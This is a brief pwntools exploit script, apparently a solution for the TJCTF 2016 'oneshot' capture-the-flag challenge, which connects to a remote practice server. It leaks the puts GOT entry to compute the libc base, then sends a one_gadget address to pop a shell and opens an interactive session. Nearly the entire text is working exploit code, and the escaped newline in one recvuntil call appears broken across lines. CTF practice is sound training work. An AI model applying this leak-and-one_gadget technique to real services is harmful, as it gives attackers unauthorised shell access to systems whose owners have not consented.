oneshot_tjctf_2016

exp

from pwn import *

#context.log_level ='debug'

elf = ELF('./oneshot_tjctf_2016')
#io = process('./oneshot_tjctf_2016')
io = remote('node3.buuoj.cn','26930')
puts_got = elf.got['puts']
libc = ELF('./libc/libc-2.23.so')

one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

io.sendlineafter('Read location?',str(puts_got))
io.recvuntil('0x0000')
puts_addr = int(io.recvuntil('
'),16)

print 'puts_addr' + hex(puts_addr)
libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]

io.sendline(str(onegadget)) 

io.interactive()